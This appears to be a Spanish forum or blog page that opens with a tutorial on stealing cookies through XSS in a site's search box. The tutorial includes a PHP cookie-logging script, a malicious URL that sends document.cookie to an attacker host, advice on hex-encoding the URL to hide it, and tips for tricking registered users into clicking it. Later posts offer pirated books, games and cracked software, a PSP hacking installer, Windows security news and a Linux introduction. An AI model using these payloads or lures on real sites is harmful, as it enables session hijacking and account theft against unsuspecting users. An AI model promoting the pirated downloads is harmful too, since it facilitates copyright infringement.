[::Tutorial::] - Ataques XSS

Bueno pues voy ha hacer una pequeña introducción a los ataques XSS, el caso que voy a poner es el de una web que utilize cookies y tenga un buscador(el típico buscador que tiene una caja de texto y un botón).
decir que para una facil compresión de este mini-tutorial es mejor tener unos conocimientos básicos sobre html.

[~]Lo primero es hacer una pequeña introduccion sobre que es una cookie:
Citar

- Una cookie es un almacen de informacion que se guarda en el ordenador del usuario y en cualkier momento la pagina puede pedir la informacion, que contiene la cookie, al ordenador del usuario...

* Ahora que sabemos que es una cookie lo que vamos ha hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php(xDD)
* Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:
codigo:
<script>alert()</script>
~]Si salta una alarma al pulsar el boton, significa que ese buscador es vulnerable.
[~]Si no salta pues no jodemos y a buscar otro...

* Suponiendo que sea vulnerable, el siguiente paso es ver el nombre de la caja de texto y del botón.

Para esto, tenemos que ver el codigo fuente de dicha página y buscar algo como:
<input type="text" name="palabra"> que será el textbox(caja de texto xD).
<input type="submit" name="buscar" value="Buscar"> que será el boton.

* Ahora ya sabemos que el textbox se llama palabra y que el botón se llama buscar.

[~]Para almacenar las cookies, tenermos dos opciones -> almazenarlas en una base de datos(mysql) o almacenarlas en un archivo de texto(la mas facil).

* A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt) cuando algun usuario caiga en el ataque y escribira a continuacion los siguientes usuarios.

cookies.php
Código:
<? $cookie = $_GET['cookie']; $fff = fopen("archivo.txt","a"); fwrite($fff, "$cookie \n"); fclose($fff); ?>

archivo.txt
Este archivo se creara automaticamente y será en el que se almacenen las cookies, osease, que para ver los resultados teneis que entrar en este archivo.

* Una vez hecho este paso solo tenemos que crear "LA URL MALIGNA"(como yo lo llamo) que será de la siguiente forma:

Código
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

* Voy a explicar cada parte de esta "URL MALIGNA".
[~]

http://www.vulnerable.com/buscador.php
Esta parte lo unico que hace es entrar en la pagina del buscador.

[~]?palabra=
Esta parte es para darle un valor a la variable palabra, es decir, si el textbox se llamara manolo esto quedaría de la siguiente forma: ?manolo=

Lo mas importante:
[~]<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
Esto es el valor que le damos a la variable palabra (que es el textbox). Este valor lo que hace esque redirecciona a la pagina http://www.atacante.com/cookie.php y le da el valor de la cookie(del usuario de la web) a la variables cookie de la pagina que creamos antes(cookies.php)
Suena un poco lioso pero es muy simple.

[~]&buscar=;
Esto lo que hace es simular que el boton (con el nombre -> buscar) este pulsado, sin esto no realizaria la acción.
Tambien decir que si el botón del buscador se llamara jose, eso tendriamos que reemplazarlo por &jose=;

* Ahora viene la parte mas importante, que es hacer que un usuario de esa web(que esté registrado) entre en ese enlace("LA URL MALIGNA").

Esto seguramente sea la parte mas complicada, porque cualkier persona con unos conocimientos muy basicos de programacion web sabría lo que hace esa "URL MALIGNA". Con lo cual vamos a proceder a "camuflar" un poco esa URL.
Para esto vamos a sustituir cada caracter por su correspondiente valor en hexagesimal poniendo el signo % delante de cada uno.

Aquí os dejo una buena tabla HEX:
http://www.ascii.cl/es/

Con lo cual iría quedando algo así:
Código:
%70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E...
esto equivaldría a:
Código:
palabra=<script>...
y tendrias que continuar cambiando los caracteres a hexagesimal.

Como conseguir que un usuario de esa web entre en esa URL, jejeje, pues ¡¡¡puedes decirle que le toca un premio si entra!!!(xDD) o puedes entrar al foro de esa web(si lo tuviera) y poner la direccion con alguna buena escusa como: "Que le pasa a la web, cuando entro en esta URL me sale una tía en bolas";
Otra opción es ponerlo como una noticia (si tienes un sistemas de noticias) o como se te ocurra.

=============================================
Solo me queda decir que no solo son vulnerbles a un ataque XSS los buscadores, puede ser cualquier formulario que os encontreis por internet, desde un registro de usuario hasta un foro(lo digo por experiencia).
=============================================

CONCLUSION: Este ataque se basa en redireccionar a un usuario(sea como sea) hacia una pagina, tuya, en la que guardes su cookie.

Creo que como introduccion no esta mal, aunque por las bullas de ponerlo pronto a lomejor me he quedado sin decir algo, weno si me acuerdo lo pongo...


P.D:Por supuesto si algo esta mal o lo sabeis explicar mejor o esto es una *****, pues decirlo aqui...

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Photoshop 6: Diseño y Creatividad (Anaya Multimedia) manuales

Datos Técnicos

Photoshop 6: Diseño y Creatividad (Anaya Multimedia)
Spanish | PDF | 320 Páginas | Anaya Multimedia | September 30, 2005 | ISBN: 844151142X | Incluye Ejemplos

Descripción

La nueva actualización de Photoshop es la más completa e importante que Adobe ha publicado en mucho tiempo y justifica el prestigio de la aplicación entre artistas, fotógrafos y diseñadores gráficos de todo el mundo.
Photoshop 6, es el producto de edición de imágenes más importante de la actualidad y añade nuevas herramientas destinadas a los profesionales de la Web, la impresión y la fotografía. El programa ha cambiado su interfaz y abreviado la forma de editar textos, incorporándosele nuevas herramientas de gestión de pinceles, muestras y estilos que lo hacen ahora más versátil que nunca.
Para los diseñadores de páginas Web, la gran novedad es ImageReady, que sigue siendo independiente, pero a la vez valiosamente integrado para crear rollovers y animaciones.
Este libro es el método más rápido, fácil y completo para dominar Photoshop 6.0. Propone el curso de aprendizaje oficial de Adobe Systems Incorporated, desarrollado por sus especialistas y probado en sus laboratorios. Apoyándose en sencillos ejemplos, contiene nociones básicas e innumerables consejos y técnicas que ocasionarán la inmediata aprobación del lector.
Incluye un CD con los archivos de las lecciones, software relacionado y algunas versiones de prueba.

Este libro le permitirá

• Trabajar con selecciones y capas.
• Dibujar, editar y retocar fotografías.
• Utilizar máscaras y canales.
• Dominar las técnicas básicas de la herramienta pluma.
• Trabajar con formas vectoriales y trazados de recorte.
• Crear efectos especiales.
• Preparar el monitor para la gestión del color.
• Preparar imágenes para impresiones en dos colores.
• Optimizar imágenes y crear imágenes animadas para la Web.
• Crear gráficos Web utilizando sectores y rollovers.
• Diseñar páginas Web con programas Adobe

Enlaces

Photoshop 6: Diseño y Creatividad (Anaya Multimedia) - Libro
Rapidshare | Megaupload | Easy-Share | DepositFiles

Photoshop 6: Diseño y Creatividad (Anaya Multimedia) - Ejemplos
Rapidshare | Megaupload | Easy-Share | DepositFiles

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Los Trucos y Efectos más Interesantes de Photoshop(Anaya Multimedia)

Datos Técnicos

Los Trucos y Efectos más Interesantes de Photoshop(Anaya Multimedia)
Spanish | PDF | Autores: Ward, AL y SMITH, COLIN | ISBN: 9788441514225 | Primera Edición | 2002 | 68.7 MB

Descripción

Si examinamos nuestro entorno, descubriremos que toda la comunicación visual que se nos ofrece está generada aplicando efectos tipográficos y fotográficos a imágenes, que en mucho casos han sido realizadas con Photoshop.
Las nuevas posibilidades de Photoshop, han generado en los diseñadores una enorme expectación por los efectos dinámicos. Este libro satisface esta demanda. No sólo aprenderá a aplicar efectos especiales excepcionales, sino que también se explican trucos para el uso más inteligente del programa y para tener una visión total de Photoshop como herramienta de diseño.
El libro es ideal tanto para aficionados como para expertos. Contiene una gran cantidad de ejercicios prácticos e imágenes fantásticas, y se han incluido tres proyectos de diseño para darle una idea sobre cómo los profesionales desarrollan sus trabajos y adoptan soluciones creativas en su práctica diaria.

Contenido

Capítulo 1. Piedra y Madera
Capítulo 2. Metal
Capítulo 3. Crista y Plástico
Capítulo 4. Superficies y Texturas
Capítulo 5. Circuitos y Electrónica
Capítulo 6. Construir tu Propia Caja de Herramientas.
Capítulo 7. Efectos de Texto.
Capítulo 8. Efectos 3D.
Capítulo 9. Colorear Creativamente.
Capítulo 10. Trucos web.
Capítulo 11. Líneas y Tramas.
Capítulo 12. Maravillas de Diseño.
capítulo 13. Secretos de Collage.
Proyecto I. Interfaz de Página Web
Proyecto II. Cartel de Pélicula
Proyecto III. Anuncio Comercial.

Enlaces

Los Trucos y Efectos más Interesantes de Photoshop
Rapidshare | Megaupload | FilesDump | DepositFiles

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Resident Evil Degeneration - Mobile

Despues del éxito que tuvo la pelicula, no podia fatar el juego, "Resident Evil Degeneration", en todas las resoluciones para celular!!!

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Grand theft auto IV - Mobile

Uno de mis juegos preferidos "Grand theft auto IV", ahora en su versión JAVA, para que lo podamos llevar comodamente en nuestro celular.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

1,000 Wallpapers para tu celular !!!

Super pack de wallpapers para tu cel, ahora si tienes de donde escojer... XD.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Como Piratear Una PSP ? (aqui la solucion)

Video de como piratear una psp

Bueno pues mirando por youtube que me encontre navegando por ahi.
y creo que no hace falta explicar nada ya que el video, lo explica muy claramente y sin complicaciones.


Material necesario:

• Una psp ya pirateada
• Una psp (original, no pirateada)
• Despertar del cementerio
• Ultrapandora instaler

.............

Funciones:

• Permite Formatear Memory Stick
• Extraccion de Archivos Update 1.50 y MsIpl.Bin
• Instalacion de MsIpl en la Memory Stick (Opcional para usuarios con Ms_Multi_Loader)
• Instalacion del Despertar del Cementerio v3 o v4
• Pandorizar Bateria
• Normalizar Bateria

................

• CreditosProgamacion realizada por: Astaroth, Arkarian, Radix00 & Marce82
• Diseño Grafico por: Alej3
• Agradecimientos a:
• Autores del Pandora: Nem, Joek, Fanjita,Chris,Jim,psp250, Ditlew, Skylark, Dark_Alex, Mathieult, Turanid, Adrahil & Booster
• Despertar del Cementerio: Dark_Alex
• Src Pandora: Hellcat & cory1492´s
• Mencion Especial: Mr.Tuto.Alek & Xenogears
• Betatester ofiales: Unicorn, Berto1989, Adrin, Anzel, Abismo y Fonsy

------------------------------------------------------------------------

Descargas:

Descargar UltraPandora Installer v2.0
(incluye despertar del cementerio)
Version para crear Stick Magica que instala directamente 3.80 M33-5

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Tumblepop - Portable

Otro clasico compas... yeah!!! "Tumblepop" , no es por aca carnales pero este juego me lo acababa con 50 cEnTaVoTeS, antes de entrar a la primaria me chutaba mi maquina de tumblepop, se que a mas de uno le va a traer buenos recuerdos este juego... a Descargar!!!

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

The King of Fighters 2002 - Portable

¿Quién de ustedes no ha jugado The King of Fighters?, Bueno compas creo que todos alguna vez lo hemos jugado, ya sea cuanto estabamos mas morritos o a lo mejor a un lo juegan como yo... en especial esta version la 2002, para mi gusto la mejor de todas.

Aqui les dejo este exelente juego en su versión portable, solo 42mb!!!

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Windows 7: descarga beta pública

Actualización: Ya están los seriales legales disponibles. El enlace, al final de la noticia.

Tras todo un día en el que los servidores de Microsoft han ido sucumbiendo a medida que la beta iba siendo distribuida a diferentes grupos, parece que han decidido posponer el lanzamiento de Windows 7 Beta hasta que añadan más infraestructuras que soporten el aluvión de descargas. Sin embargo, no han comentado cuándo será.

Después de invitar a los suscriptores de TechNet y MSDN, supuestamente iba a estar disponible de manera legal para las primeras dos millones y medio de personas que quisieran probarla. Y aunque durante todo el día los enlaces de descarga desde los servidores de Microsoft han ido yendo y viniendo, aunque consigas descargarla deberás volver a registrarte a por tu serial legal, que extiende los 30 días de prueba hasta el 9 de agosto de este año. Y por ahora, la web de registro no está disponible.

La seguridad en Windows Vista

Microsoft lanzó Windows Vista, el primer sistema operativo de Microsoft desde octubre de 2001 cuanto lanzó Windows XP. El acontecimiento se llevó a cabo esta semana en la ciudad de Nueva York. Junto a Windows Vista el gigante informático lanzó además la nueva suite Office 2007.

El lanzamiento de Windows Vista ha sido anunciado desde hace 6 años cuando Microsoft acercó posiciones con la seguridad informática de su software mediante su “iniciativa de computación confiable”. Esta iniciativa se llevó a cabo a raíz de los ataques sufridos por virus y gusanos como Code Red y Nimda . El primer resultado de este giro hacia la seguridad de su software fue la aparición del Service Pack 2 de Windows XP (que muchos hemos puesto en entredicho que realmente incrementara la seguridad). Recientemente el resultado de su nuevo giro hacia la seguridad fue Internet Explorer 7 el cual incorpora ventajas adicionales hacia la seguridad como la limitación impuesta a la acción de los controladores ActiveX y un sistema antiphishing.

Su Windows Vista incorpora de serie software contra el “spyware” y “programas espía” y contra la instalación de otros programas maliciosos, así como mecanismos para impedir el paso al disco duro si el ordenador es controlado por delincuentes informáticos.

El nuevo software incorpora tres ventajas sobre seguridad con respecto a su antecesor “XP” que dificulta un ataque cuando una vulnerabilidad sea descubierta : kernel Match Protection (PatchGuard), Data Execution Prevention (Prevención de ejecución de datos) y Address Space Layout Randomization (ASLR).

Los avances en seguridad de Windows Vista no están dirigidos a impedir que penetre en el sistema códigos maliciosos, de ese trabajo ya se encargan los antivirus, sino a impedir que un programa mal diseñado desestabilice el sistema e introduzca agujeros de seguridad.

A partir de este momento las principales marcas de antivirus deben de adaptar, si no lo han hecho ya, su software al nuevo sistema operativo. Uno de los mejores antivirus existentes en el mercado, a mi juicio si no el mejor, es el caso de ESET NOD32 que ha mejorado su código para adaptarlo al nuevo sistema operativo.

El nuevo sistema operativo no traerá un antivirus instalado, sin embargo sí trae un Firewall y Windows Defender que ayuda a proteger el equipo contra Spywares y códigos maliciosos.

Microsoft ha reconocido que la aparición de fallos es inevitable y es solo cuestión de tiempo, “sabemos que no tendremos el códigoperfecto al 100%. Nadie lo tiene en la industria informática pero Vista dispone de muchas capas de defensa” dijo Stephen Toulouse encargado de la Seguridad de Vista.

En el mundo informático ya existen recompensas cuantiosas para quien descubra un agujero de seguridad e incluso para quien diseñe el código que explote esos agujeros de seguridad. IDefense Labs, subsidiaria de la empresa de tecnología VeriSign, ofrece 8.000 $ a los primeros seis investigadores que encuentren un agujero de seguridad en Vista y 4.000 $ más a quienes diseñen los códigos que exploten esa vulnerabilidad.

El objetivo de está recompensa no es otro que vender esta información a empresas y agencias gubernamentales para que protejan sus sistemas.

Windows Vista ya ha dado también que hablar por los requisitos excesivos y por la bajada de rendimiento que ofrece frente a XP

Fuentes: http://www.microsoft.com
http://www.iblnews.com
http://www.vsantivirus.com

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Fraps v2.9.8 Build 7777 Retail, Graba tus Partidas de Videojuegos

Datos Técnicos

Fraps v2.9.8 Build 7777 Retail
English | 3MB | Retail

Descripción

Fraps es una herramienta genérica para monitorizar el número de imágenes por segundo obtenidas en juegos bajo DirectX y Glide, con el que además podrás realizar capturas de imágenes y vídeos.

Fraps te muestra en la esquina de la pantalla que elijas el número de FPS (imágenes por segundo) en todo momento.

El único requisitos para que Fraps funcione correctamente es que se use el proceso Flip de DirectDraw, momento entonces en el que Fraps realiza los cálculos.

Capturas

Enlaces

Fraps v2.9.8 Build 7777 Retail
Rapidshare | Megaupload | DepositFiles | Mediafire

Fraps v2.9.7 Build 7771 Retail

Rapidshare | Megaupload | Easy-Share | UploadJockey

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

Save2pc Pro v3.5.1.0, Descarga Videos de Youtube, Video Google y mas

Datos Técnicos

Save2pc Pro v3.5.1.0
6.3MB | Ingles | Medicina Inc

Descripción

Seguro que ya conoces Youtube, el famoso servicio web de almacenamiento de vídeos de Google. Sería genial poder descargar los vídeos que están almacenados para poder disfrutar de ellos sin conexión a internet.
save2pc es una aplicación gratuita para Windows que te permitirá descargar cualquier vídeo almacenado en Youtube directamente a tu disco duro, sin pérdida de calidad ni de sonido.
Puedes elegir el directorio donde serán almacenados tus vídeos o seleccionar el formato del vídeo descargado (AVI, MPEG o FLV) antes de descargar tus vídeos, lo que es de gran utilidad.
Además, ahora podremos descargar también vídeos almacenador en el otro servicio web de almacenamiento de vídeos Google Vídeo. Todo esto hace de save2pc una herramienta de gran utilidad y facilidad de uso.

Sitios Web Soportados

1. Youtube.Com
2. GodTube.com
3. Video.Google.com
4. vids.Myspace.com
5. Megavideo.com
6. Break.com
7. DailyMotion.com
8. TeacherTube.com
9. Blip.tv
10. Veoh.com
11. EyeSpot.com
12. JumpCut.com
13. Guba.com
14. PornoTube.com
15. RedTube.com
16. YouPorn.com
17. yuvutu.com
18. xVideos.com
19. xHamster.com
20. Vho.com
21. Rude.com
    

Capturas

Enlaces

Save2pc Pro v3.5.1.0
Rapidshare | Megaupload | Easy-Share | DepositFiles

Save2pc Pro v3.50

Rapidshare | Megaupload | Easy-Share | DataUp | UploadJockey

Save2pc Pro v3.46.0

Rapidshare | Megaupload | Easy-Share | Mediafire | Filefactory

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!

El Uso de Sistemas Linux en PCs de Escritorio

1 - Introducción que vale la pena leer

El objetivo de este poner un par post de linux es incentivar el uso de un Sistema Linux en PCs de escritorios. Aquellos que han utilizado Windows recordarán que alguna vez también fue algo desconocido. De manera que eso desconocido que hoy es Linux puede transformarse también en algo conocido y utilizable . Para poder comprender estos post's no es necesario tener una gran experiencia, los requisitos son sencillos: saber utilizar el mouse, el teclado, manipular ventanas, abrir y guardar archivos, haber utilizado programas tipo Office y otras aplicaciones similares. Es decir, es necesario que el lector alguna vez haya usado la computadora con un sistema de ventanas al estilo Microsoft Windows, y si ha utilizado DOS alguna vez, le será también de utilidad.

Estos post pretende mostrar que se puede tener instalado Linux en su PC de escritorio y sacarle todo el provecho. La guía es meramente orientativa, pero de ninguna manera técnica.

Los post consisten en sí, una especie de FAQ (lista de preguntas que son∞ o ∞ las más frecuentes), y en opinión del autor viene a llenar un hueco existente en la documentación libre. Esta documentación es libre, puede ser reproducida tanto para fines comerciales como personales, toda vez que se respeten los términos de la licencia.

En la actualidad, todavía existe la creencia de que Linux es una amenazadora pantalla negra con letras blancas. Muchos imaginan que usar Linux es solamente para iluminados. Otros suponen que usar Linux y/o software libre los dejará aislados, que su vinculación con el mundo depende de la utilización de un único sistema operativo. Y otros creen que el uso de un escritorio gráfico con una barra de tareas y ventanas es algo exclusivo y original de Microsoft Windows. Linux constituye hoy una muy buena opción para distribuirlo como Sistema Operativo preinstalado. De esta manera, se puede bajar el costo del producto para poder centrarse en la oferta de servicios. Además, si es vendedor de hardware, podría solucionar problemas legales en el caso de haber estado vendiendo copias prohibidas de software privativo (tales como Microsoft Windows y Microsoft Office). Se debería reclamar especialmente a los fabricantes de hardware que aun no lo han hecho para que desarrollen drivers∞ libres para Linux.

Aquellos que se consideran meramente usuarios, pueden hacer un aporte importante, además de usar software libre, podrían promover la venta de Linux preinstalado, transmitirles la inquietud a los comerciantes del ramo que tienen cerca; o mejor aun: convertirse en distribuidores de software libre preinstalado, y así, luchar para que todos tengan la libertad de elegir el software.

Es importante considerar que el software es parte integral de las tareas comunes en la vida cotidiana. De ahí la importancia del software sea libre.

Los lectores de las versiones anteriores notarán que se han modificados muchas cosas. Algunas partes han sido no solamente reescritas sino también profundamente repensadas, de manera que se agregaron preguntas y se modificaron no pocas respuestas. Se ha dividido Los post en tres secciones a fin de ayudar al usuario para que pueda encontrar rápidamente las respuestas. La primera sección trata sobre los interrogantes generales acerca de Linux, la segunda se refiere a los programas más importantes que existen en los Sistemas Linux, y la última, aborda el tema de las tareas comunes en el sistema.

Otra novedad importante es el agregado de enlaces a Wikipedia∞, que servirá para ampliar y clarificar muchas palabras desconocidas para aquellos que no trabajan alrededor de la informática.

Agradecer no cuesta nada, Valora los aportes de los demas
y si te ha sido de utilidad comenta!!